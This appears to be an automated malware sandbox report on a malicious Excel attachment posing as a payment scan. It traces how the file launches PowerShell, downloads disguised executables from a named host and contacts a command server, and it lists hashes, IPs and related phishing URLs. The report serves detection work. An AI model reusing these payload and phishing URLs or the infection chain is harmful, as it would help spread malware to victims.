      Sample-level signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 8 other signatures

      Process tree recovered from the graph (the graph image itself is not reproduced here):

      EXCEL.EXE
        dropped: C:\Users\...\Scanned_25526662-Payment.xls.LNK (MS)
        signatures: Document exploit detected (process start blacklist hit); PowerShell case anomaly found
        cmd.exe
          signatures: PowerShell case anomaly found
          powershell.exe
            DNS/IP: lankarecipes.com 192.185.236.165, ports 49731, 80 (UNIFIEDLAYER-AS-1US, United States)
            dropped: C:\Users\user\AppData\Local\Temp\Test1.txt (PE32); C:\Users\user\AppData\...\nwaha3c5.cmdline (UTF-8)
            signatures: Powershell drops PE file
            cmd.exe
              WMIC.exe
                signatures: Creates processes via WMI
            cmd.exe
              dropped: C:\Users\user\AppData\Local\Temp\Test3.jpg (PE32)
            csc.exe
              dropped: C:\Users\user\AppData\Local\...\nwaha3c5.dll (PE32)
              cvtres.exe
          conhost.exe
      Test3.jpg
        signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Maps a DLL or memory area into another process; Contains functionality to hide a thread from the debugger
        Test3.jpg
          DNS/IP: 45.15.143.216, ports 49734, 49740, 49742 (DEDIPATH-LLCUS, Latvia)
          signatures: Hides threads from debuggers


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Scanned_25526662-Payment.xls | 15% | Virustotal |
      Scanned_25526662-Payment.xls | 15% | ReversingLabs | Document-Word.Trojan.Heuristic

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\Test3.jpg | 100% | Avira | TR/Dropper.Gen
      C:\Users\user\AppData\Local\Temp\Test3.jpg | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\Local\Temp\Test1.txt | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\Local\Temp\Test1.txt | 36% | ReversingLabs | Win32.Trojan.Caynamer

      Unpacked PE Files

      Source | Detection | Scanner | Label
      27.2.Test3.jpg.30e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
      29.1.Test3.jpg.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
      29.2.Test3.jpg.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

      Domains

      Source | Detection | Scanner | Label
      lankarecipes.com | 0% | Virustotal |

      URLs

      Source | Detection | Scanner | Label
      https://cdn.entity. | 0% | URL Reputation | safe
      https://wus2-000.contentsync. | 0% | URL Reputation | safe
      http://lankarecipes.com/Sparc.jp | 0% | Avira URL Cloud | safe
      https://powerlift.acompli.net | 0% | URL Reputation | safe
      https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
      https://cortana.ai | 0% | URL Reputation | safe
      https://api.aadrm.com/ | 0% | URL Reputation | safe
      https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal |
      https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
      https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
      https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
      https://officeci.azurewebsites.net/api/ | 0% | Virustotal |
      https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
      https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
      https://wus2-000.pagecontentsync. | 0% | URL Reputation | safe
      https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
      https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
      https://www.odwebp.svc.ms | 0% | URL Reputation | safe
      https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
      https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
      https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
      https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
      https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
      http://lankarecipes.com/Sparc.jpg | 0% | Avira URL Cloud | safe
      https://ncus-000.contentsync. | 0% | URL Reputation | safe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
      https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
      https://dataservice.o365filtering.com | 0% | URL Reputation | safe
      https://api.cortana.ai | 0% | Avira URL Cloud | safe
      https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      lankarecipes.com | 192.185.236.165 | true | true |  | unknown

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      http://lankarecipes.com/Sparc.jpg | false | Avira URL Cloud: safe | unknown

      URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      https://api.diagnosticssdf.office.com | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://login.microsoftonline.com/ | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://shell.suite.office.com:1443 | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://autodiscover-s.outlook.com/ | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://cdn.entity. | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false | URL Reputation: safe | unknown
      https://api.addins.omex.office.net/appinfo/query | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://wus2-000.contentsync. | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false | URL Reputation: safe | unknown
      https://clients.config.office.net/user/v1.0/tenantassociationkey | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      http://lankarecipes.com/Sparc.jp | PowerShell_transcript.648351.+jaH7BR7.20210108094000.txt.3.dr | true | Avira URL Cloud: safe | unknown
      https://powerlift.acompli.net | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false | URL Reputation: safe | unknown
      https://rpsticket.partnerservices.getmicrosoftkey.com | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false | URL Reputation: safe | unknown
      https://lookup.onenote.com/lookup/geolocation/v1 | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://cortana.ai | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false | URL Reputation: safe | unknown
      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://cloudfiles.onenote.com/upload.aspx | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://entitlement.diagnosticssdf.office.com | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://api.aadrm.com/ | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false | URL Reputation: safe | unknown
      https://ofcrecsvcapi-int.azurewebsites.net/ | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://api.microsoftstream.com/api/ | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://cr.office.com | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://portal.office.com/account/?ref=ClientMeControl | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://ecs.office.com/config/v2/Office | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://graph.ppe.windows.net | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false |  | high
      https://res.getmicrosoftkey.com/api/redemptionevents | 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | false | URL Reputation: safe | unknown
                                                  https://powerlift-frontdesk.acompli.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplate6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://wus2-000.pagecontentsync.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplate6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetect6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.ms6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                high
                                                                https://graph.windows.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://officesetup.getmicrosoftkey.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://analysis.windows.net/powerbi/api6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                    high
                                                                    https://prod-global-autodetect.acompli.net/autodetect6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                      high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                        high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                          high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                            high
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                              high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspx6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                      high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                        high
                                                                                        https://management.azure.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                          high
                                                                                          https://incidents.diagnostics.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/ios6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                high
                                                                                                                https://curl.haxx.se/docs/http-cookies.htmlTest3.jpg, Test3.jpg, 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocation6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                    high
                                                                                                                    https://templatelogging.office.com/client/log6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office365.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                        high
                                                                                                                        https://webshell.suite.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                          high
                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus-000.contentsync.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://login.windows.net/common/oauth2/authorize6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://contentstorage.omex.office.net/addinclassifier/officeentities6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://augloop.office.com/v26F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://skyapi.live.net/Activity/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://clients.config.office.net/user/v1.0/mac6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://dataservice.o365filtering.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://api.cortana.ai6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://onedrive.live.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://ovisualuiapp.azurewebsites.net/pbiagave/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown

                                                                                                                                                      Contacted IPs

                                                                                                                                                      Public

IP               Domain    Country        ASN    ASN Name             Malicious
45.15.143.216    unknown   Latvia         35913  DEDIPATH-LLC (US)    false
192.185.236.165  unknown   United States  46606  UNIFIEDLAYER-AS-1 (US)  true

                                                                                                                                                      General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 337288
Start date: 08.01.2021
Start time: 09:35:32
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 47s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Scanned_25526662-Payment.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.expl.evad.winXLS@19/22@1/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 76.2% (good quality ratio 44.6%)
                                                                                                                                                      • Quality average: 49.4%
                                                                                                                                                      • Quality standard deviation: 44.8%
                                                                                                                                                      HCA Information:Failed
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, SgrmBroker.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.42.151.234, 52.109.32.63, 52.109.8.22, 52.109.12.21, 104.43.139.144, 104.79.90.110, 13.107.5.88, 13.107.42.23, 51.104.139.180, 8.253.145.105, 8.248.117.254, 8.248.149.254, 8.253.207.121, 8.253.145.120, 92.122.213.194, 92.122.213.247, 20.54.26.129
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, arc.msn.com.nsatc.net, config.edge.skype.com.trafficmanager.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
09:40:19 | API Interceptor | 35x Sleep call for process: powershell.exe modified
09:40:45 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
09:41:00 | API Interceptor | 539x Sleep call for process: Test3.jpg modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
192.185.236.165 | Telex06012020.xls | malicious | lankarecipes.com/mages.jpg

Domains

Match | Associated Sample Name / URL | Detection | Context
lankarecipes.com | Telex06012020.xls | malicious | 192.185.236.165

ASN

Match | Associated Sample Name / URL | Detection | Context
DEDIPATH-LLCUS | X8yhUJB4xd.exe | malicious | 45.15.143.234
DEDIPATH-LLCUS | SecuriteInfo.com.Trojan.Siggen11.57077.29929.exe | malicious | 45.15.143.195
DEDIPATH-LLCUS | vJHWQgfJ23.exe | malicious | 45.12.110.193
DEDIPATH-LLCUS | Pago Fecha 2021.xls | malicious | 45.81.7.81
DEDIPATH-LLCUS | #U00d6deme.exe | malicious | 193.239.147.22
DEDIPATH-LLCUS | remittance for the month of Dec.xls | malicious | 45.15.143.142
DEDIPATH-LLCUS | SecuriteInfo.com.Generic.mg.5188c198e093757a.exe | malicious | 45.15.143.142
DEDIPATH-LLCUS | PICTURE SLIDE.exe | malicious | 193.239.147.22
DEDIPATH-LLCUS | New Import and Export Regulation.xlsx | malicious | 161.8.142.134
DEDIPATH-LLCUS | fdwv4hWF1M.exe | malicious | 213.59.119.203
DEDIPATH-LLCUS | svchost.exe | malicious | 161.8.142.134
DEDIPATH-LLCUS | jEgLNI40Ro9O775.exe | malicious | 185.196.0.243
DEDIPATH-LLCUS | Gxuerxdose.exe | malicious | 193.239.147.32
DEDIPATH-LLCUS | x472st8RLb.exe | malicious | 193.239.147.32
DEDIPATH-LLCUS | FmhsHF4JR9.exe | malicious | 45.15.143.142
DEDIPATH-LLCUS | BxEz8S5iu3.exe | malicious | 193.239.147.211
DEDIPATH-LLCUS | nocryt.xls | malicious | 193.239.147.76
DEDIPATH-LLCUS | inter.xls | malicious | 193.239.147.76
DEDIPATH-LLCUS | nocryt.xls | malicious | 193.239.147.76
DEDIPATH-LLCUS | inter.xls | malicious | 193.239.147.76
UNIFIEDLAYER-AS-1US | Telex06012020.xls | malicious | 192.185.236.165
UNIFIEDLAYER-AS-1US | ul9kpUwYel.xls | malicious | 192.185.194.191
UNIFIEDLAYER-AS-1US | ______.doc | malicious | 192.185.151.24
UNIFIEDLAYER-AS-1US | ______.doc | malicious | 192.185.151.24
UNIFIEDLAYER-AS-1US | http://0620218.unfreezegrowers.com/bGVhaC5oZWl0bmVyQGV4cC5jb20= | malicious | 162.241.175.181
UNIFIEDLAYER-AS-1US | http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.com | malicious | 50.87.150.0
UNIFIEDLAYER-AS-1US | https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeG | malicious | 162.241.127.190
UNIFIEDLAYER-AS-1US | https://cypressbayhockey.com/NO | malicious | 192.185.120.89
UNIFIEDLAYER-AS-1US | https://pdfsharedmessage.xtensio.com/7wtcdlta | malicious | 108.179.246.23
UNIFIEDLAYER-AS-1US | form.doc | malicious | 162.241.148.243
UNIFIEDLAYER-AS-1US | RFQPO90865802ICONME.exe | malicious | 192.185.131.105
UNIFIEDLAYER-AS-1US | Ekz Payment.htm | malicious | 192.185.196.146
UNIFIEDLAYER-AS-1US | http://moneypay.best/ | malicious | 192.232.250.4
UNIFIEDLAYER-AS-1US | https://canningelectricinc.wordpress.com/ | malicious | 192.185.188.96
UNIFIEDLAYER-AS-1US | Lmcgrath - FAX_ALNRSUW.html | malicious | 192.185.29.156
UNIFIEDLAYER-AS-1US | Inquiry-RFQ93847849-pdf.exe | malicious | 108.167.141.199
UNIFIEDLAYER-AS-1US | W08347.exe | malicious | 192.185.117.218
UNIFIEDLAYER-AS-1US | https://datetheright1.com/damn/sharepoint%20new | malicious | 162.144.40.98
UNIFIEDLAYER-AS-1US | http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/ | malicious | 162.241.101.253
UNIFIEDLAYER-AS-1US | 8G9b9FXspm.exe | malicious | 162.241.219.113

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6F929868-7C3F-4808-A89F-5BECCA241772
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 132942
Entropy (8bit): 5.3729511389077285
Encrypted: false
SSDEEP: 1536:TcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:XrQ9DQW+zBX8P
MD5: BB7821180C56896263A4E3D624E9851B
SHA1: 19BC0AE70A906B3824FDCE1B6EE108CEE340B416
SHA-256: 6B4AD69C0F7F1259DE7C6080B980B269623849954559ED507415C0E44A799C8C
SHA-512: BEE6FD93C66FCADE929119B19F78D3A1235F477DD7A935DE8F4FEB8A77AAA6274B85E3BE0B6D0CBFEF6F5FB6EA8CC244A917EB649CC2959488FB2D10BDD146FA
Malicious: false
Reputation: low
